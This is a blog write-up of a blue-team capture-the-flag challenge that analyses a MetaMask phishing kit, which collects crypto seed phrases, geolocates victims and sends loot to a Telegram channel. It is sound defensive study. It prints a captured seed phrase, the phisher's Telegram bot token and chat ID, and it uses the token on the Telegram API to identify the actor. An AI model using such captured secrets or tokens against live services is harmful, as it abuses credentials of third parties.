GrabThePhisher — CyberDefenders.org

Phishing is an attempt by cybercriminals posing as legitimate institutions, usually via email, to obtain sensitive information from targeted individuals.

Last year 2021, more than 46, 000 people reported losing over $1 billion in crypto scams. In this challenge I will work on how the cybercriminals abuse and compromised the server to impersonate as a crypto trusted wallet.

Challenge: https://cyberdefenders.org/blueteam-ctf-challenges/95

Questions and Solutions:

  1. Which wallet is used for asking the seed phrase?

A seed phrase, seed recovery phrase or backup seed phrase is a list of words which store all the information needed to recover Bitcoin funds on-chain. Wallet software will typically generate a seed phrase and instruct the user to write it down on paper.

1st After extracting the zip file there are multiple files extracted piece of web file. open-up the index html and analyzing the page, checking every the wallet function button. The only works is “Metamask” with the response another webpage.

2nd On extracted zip file there are folder metamask name with a malicious php script.

Solution: Metamask

2. What is the file name that has the code for the phishing kit?

On extracted file there are directories metamask. Opening the directories cat out metamask.php” has a malicious phishing kit code after analyzing the code.

Solution: metamask.php

3. In which language was the kit written?

refer on question number 2 file name extension

Solution: PHP Language

4. What service does the kit use to retrieve the victim’s machine information?

On the first line of phishing kit code as you can see there is a request API activity following of request for geographical location and date.

Sypex Geo is a product for determining the location of a visitor by IP address, from the creators of Sypex Dumper . Having received an IP address, Sypex Geo provides information about the visitor’s location — country, region, city, geographic coordinates.

Solution: Sypex Geo

5. How many seed phrases were already collected?

On extracted zip file there is a log directory with the log.txt file. Opening the log file there are only 3 phrases with 12 words.

Solution: 3

6. Write down the seed phrase of the most recent phishing incident?

The 3rd seed phrases is the recent.

Solution: father also recycle embody balance concert mechanic believe owner pair muffin hockey

7. Which medium had been used for credential dumping?

This question is too confusing for me. Medium — an agency or means of doing something. (Synonym: Channel, Forum).

On Phishing kit the function sendTel there is a api telegram used. Telegram is a freemium, cross-platform, cloud-based instant messaging service.

Solution: Telegram

8. What is the token for the channel?

On sendTel function there is a tokken and other strings used.

Solution: 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10

9. What is the chat ID of the phisher’s channel?

On sendTel function there is a id and other strings used.

Solution: 5442785564

10. What are the allies of the phish kit developer?

On script there a small piece of message. The message complementing all the hustlers. On regards ending signature there is a unique alias.

Solution: j1j1b1s@m3r0

11. What is the full name of the Phish Actor?

On this question we can use the API of telegram to extract the information based on the functionality used by phishing kit code. From phish kit I used the id and the tokken. Using the get chatmethod of Telegram API. I can now retrieve the information full name of the developer and the username used.

Solution: Marcus Aurelius

12. What is the username of the Phish Actor?

Refer on question number 11.

We must be vigilant in every link we received.

Thank you for reading this blog post. Dagger out!

--

--

Security Researcher

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store